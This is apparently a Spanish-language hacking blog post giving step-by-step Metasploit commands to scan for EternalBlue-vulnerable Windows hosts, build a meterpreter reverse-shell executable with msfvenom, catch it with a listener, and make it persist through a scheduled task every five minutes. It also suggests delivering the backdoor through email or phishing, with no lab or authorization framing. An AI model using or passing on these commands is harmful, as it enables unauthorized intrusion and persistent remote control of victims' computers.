---
title: "Metasploit para crear un backdoor para Windows y hacerlo persistente"
date: 2023-02-25
draft: false
author: "x3r0x"
tags: ["tech", "tecnologia", "hacking", "hackers",]
---

### Paso 1: Escaneo de la red

Antes de empezar, necesitas escanear la red en busca de máquinas vulnerables a través de nmap. Una vez que hayas identificado la máquina objetivo, anota su dirección IP.
```
nmap -p 445 --script smb-vuln-ms17-010 <target>
```

Este es un comando de ejemplo el escaneará el puerto 445 y ejecutará el script **"smb-vuln-ms17-010"** que busca vulnerabilidades relacionadas con el exploit EternalBlue en sistemas Windows. Debes reemplazar **target** con la dirección IP o el rango de direcciones IP que deseas escanear. 

### Paso 2: Creación del backdoor

Para crear el backdoor, utilizaremos el módulo msfvenom de Metasploit. El siguiente comando creará un backdoor con el nombre backdoor.exe en el directorio actual:


```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tu dirección IP> LPORT=<número de puerto> -f exe > backdoor.exe
```

Asegúrate de reemplazar **tu dirección IP** y **número de puerto** con tu dirección IP y el número de puerto que desees utilizar para establecer la conexión.

### Paso 3: Configuración de Metasploit

Ahora, necesitamos configurar Metasploit para que pueda recibir la conexión del backdoor que hemos creado. Abre Metasploit con el comando msfconsole y ejecuta los siguientes comandos:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <tu dirección IP>
set LPORT <número de puerto>
```

### Paso 4: Ejecución del backdoor

Una vez que Metasploit está configurado, ejecuta el backdoor en la máquina objetivo. Puedes enviar el archivo por correo electrónico, utilizar una  herramienta de phishing o cualquier otro método que se te ocurra.

Cuando el backdoor se ejecute en la máquina objetivo, se conectará a Metasploit y te dará acceso remoto a la misma.

### Paso 5: Hacer el backdoor persistente

Para hacer el backdoor persistente, utilizaremos el módulo
```

post/windows/manage/persistence de Metasploit. 
```
Ejecuta el siguiente comando en Metasploit:

```
use post/windows/manage/persistence
set SESSION <número de sesión>
set LHOST <tu dirección IP>
set LPORT <número de puerto>
set PAYLOAD windows/meterpreter/reverse_tcp
set INTERVAL 5
run
```

Asegúrate de reemplazar **<número de sesión>** , **<tu dirección IP>** y **<número de puerto>** con los valores correspondientes.

Este comando establecerá una tarea programada en la máquina objetivo que ejecutará el backdoor cada 5 minutos. De esta manera, si el backdoor es 
eliminado, se volverá a ejecutar automáticamente.

¡Cookie! Ahora tienes acceso remoto persistente a la máquina objetivo a través del backdoor que has creado con Metasploit.
 
